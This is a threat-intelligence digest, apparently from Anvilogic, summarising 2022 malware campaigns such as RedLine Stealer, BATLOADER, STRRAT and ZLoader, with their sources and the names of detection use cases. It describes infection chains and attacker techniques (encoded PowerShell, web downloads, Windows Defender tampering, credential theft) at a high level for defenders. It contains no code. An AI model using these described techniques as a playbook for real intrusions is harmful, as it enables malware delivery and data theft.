CaddyWiper Data Wiper Attacks Ukraine

March 15, 2022

Initially discovered by ESET researchers and reported by BleepingComputer, a new data-destroying malware, named CaddyWiper, is attacking Ukrainian organizations.

Malware Services & PrivateLoader

February 15, 2022

Malware Services & PrivateLoader

Industry: N/A | Level: Strategic | Source: Intel471

Intel471 provides research on Pay-per-Install (PPI) malware services that are outsourced participants willing to facilitate the “distribution and delivery” of malware. The main method of distribution has been through search engine optimization (SEO) schemes to lure victims seeking pirated software. Intel471 also provides details of an associated PPI program, PrivateLoader detailed as the following “PrivateLoader sits at the front of this operation and communicates with its back-end infrastructure to retrieve URLs for the malicious payloads to “install” on the infected host. As is the case with downloaders tied to PPI services, PrivateLoader communicates a variety of statistics such as which payloads were downloaded and launched successfully.” Based on tracking data with unique download hashes, the most popular PPI malware dropped are Smokeloader, Redline and Vidar. Although not desired by PPI operators (due to malware being rendered inoperable) ransomware can be executed from these services. Observed instances with ransomware execution have been connected with banking trojans using ransomware associated with “LockBit and STOP Djvu ransomware families.”

Threat Group, TA402/Molerats & NimbleMamba Malware

February 15, 2022

Threat Group, TA402/Molerats & NimbleMamba Malware

Industry: Aviation, Government and Think Tanks | Level: Tactical | Source: ProofPoint

ProofPoint shares research on threat group, TA402 (aka Molerats) persistent in targeting “Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline” since late 2021. The group operates in the interest of Palestinian Territories. Frequent usage of geofencing techniques is observed from the group, only directing targets of interest to malicious websites, with non-targets getting directed to benign sites. Dating back to November 2021, three different websites, Quora, Dropbox and WordPress, were URLs leveraged by the threat group in phishing emails to distribute a RAR file containing the NimbleMamba malware and/or a trojan, BrittleBush. In the Dropbox attack chain, geofencing was not utilized however, the DropBox API was used for C2 communication.

  • Anvilogic Scenario: TA402/Molerats Threat Behavior
  • Anvilogic Use Cases:
    • DropBox API Traffic
    • Compressed File Execution
    • Output to File

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

February 15, 2022

RedLine Stealer spreading from illegitimate Windows 11 Upgrade

Industry: N/A | Level: Tactical | Source: HP – ThreatResearch

Threat Research from HP has identified the distribution of information-stealing malware, RedLine Stealer posing as an installer to Microsoft’s latest Windows 11 OS version. The threat campaign is recent, as one of the malicious domain windows-upgraded[.]com was registered on January 27th, 2022. The fraudulent Microsoft page drops a malicious zip file, “Windows11InstallationAssistant.zip” for users to click the download link. The zip file is hosted on Discord containing “six Windows DLLs, an XML file and a portable executable.” Upon execution of the malicious executable file, an encoded PowerShell command runs with a download of a jpg file following a 21-second timeout. The jpg file is actually a disguised DLL file. Once the DLL is loaded, the RedLine Stealer payload is active and able to proceed with data collection and exfiltration as desired by the attacker.

  • Anvilogic Scenario: InfoStealer Malware Behaviors
  • Anvilogic Use Cases:
    • Encoded Powershell Command
    • Query Registry

SEO Poisoning dropping malware

February 08, 2022

SEO Poisoning dropping malware

Industry: N/A | Level: Tactical | Source: Mandiant

Mandiant Managed Defense has identified a threat campaign distributing BATLOADER malware and malicious installations of remote management software, ATERA from crafting website themes with freeware, and using search engine optimization poisoning to lure victims. The malicious webpages incorporate Traffic Direction System (TDS) to verify user attributes determining if the site visitor should be directed to a malicious or legitimate page in order to avoid detection from security researchers. Two different infection chains are utilized for the malware. BATLOADER users attempting to download the alleged software also receive an installer, that runs native tools such as PowerShell, Msiexec.exe, and Mshta.exe in order to evade detection. A notable DLL file, “AppResolver.dll” contains a malicious VBScript that’s executed with Mshta.exe. With the ATERA infection chain, an MSI file is dropped for the ATERA agent to be installed, To maintain persistence the network discovery component of ATERA, Splashtop would also be installed and scripts will be pushed from the agent to tamper with the host by modifying Windows Defender file exclusions and downloading additional payloads. Currently, no known attribution of the activity is determined for a threat actor group, however, there is some overlap in techniques from the leaked Conti playbooks in August 2021.

  • Anvilogic Scenario: Malicious Software Download via MSI
  • Anvilogic Use Cases:
    • MSHTA.exe execution
    • MSIExec Install MSI File
    • Modify Windows Defender

APT36’s Malware Arsenal

February 01, 2022

APT36’s Malware Arsenal

Industry: N/A | Level: Tactical | Source: TrendMicro

TrendMicro’s tracking of APT36/Earth Karkaddan shared research from January 2020 to September 2021, detailing the threat group’s recent campaigns. Crimson RAT (Windows), ObliqueRat (Windows) and CapaRAT (Android), were the three malware observed from the group. The threat group utilizes spear-phishing emails or a USB for initial access. The phishing emails lure victims, leveraging themes involving the government, coronavirus and others. Following the execution of a malicious link, file, or document, the RAT drops and executes on the system. Activities following, vary with the RATs having numerous capabilities for system reconnaissance, data collection and exfiltration.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • New AutoRun Registry Key

Diavol Ransomware and TrickBot Group

January 25, 2022

Diavol Ransomware and TrickBot Group

Industry: N/A | Level: Operational | Source: IC3.Gov

In the latest flash report released from the FBI, the agency shared that since tracking Diavol ransomware in October 2021, an association has been observed between the ransomware group and the Trickbot Group. The correlation comes an overlap in the two group’s tactics, as from the unique system/bot ID, generated by Diavol on victim workstations the format is nearly identified from what’s used by Trickbot. As well as, the usage of an associated Trickbot malware Anchor DNS by the ransomware gang. There is currently, limited technical details shared by the agency, rather high-level observations of the group. The threat actors have compromised several entities with ransom demands ranging from $10,000 – $500,000. While the group does utilize double extortion tactics, to date, no observed data leaks were found to be associated with Diavol.

  • Anvilogic Scenario: Diavol Ransomware

Remote Access Trojan – STRRAT

January 25, 2022

Remote Access Trojan – STRRAT

Industry: N/A | Level: Tactical | Source: Fortinet

Research from FortiGuard shared information for remote access trojan (RAT), STRRAT, which has been utilized in the threat landscape since mid 2020. The latest activity with the malware involved its distribution through phishing emails, leveraging a theme that impersonates shipping company Maersk, to lure victims with messages involving product shipments and deliveries. The initial dropper is contained in a Microsoft Excel document that downloads the RAT upon execution. The java-based RAT is identified to be obfuscated with “Allatori Obfuscator.” The malware setups persistence by adding entries to the autorun registry keys, with additional capabilities including check running processes, querying host information, logging keystrokes, stealing browser and email credentials.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Case: Suspicious Email Attachment

ZLoader

January 05, 2022

ZLoader

Industry: N/A | Level: Operational | Source: CheckPoint

Research provided by Golan Cohen from CheckPoint Research identifies new activity with ZLoader malware. The malware utilizes compromised remote software management – Atera for initial access. Following the agent install, batch scripts are executed to setup persistence and modify properties of windows defender. The malware attempts to utilize stealth utilizing many LOLBin binaries.

  • Anvilogic Scenario: ZLoader Installation
  • Anvilogic Use Cases:
    • MSIExec Install MSI File
    • Executable Create Script Process
    • Modify Windows Defender
    • Invoke-WebRequest Command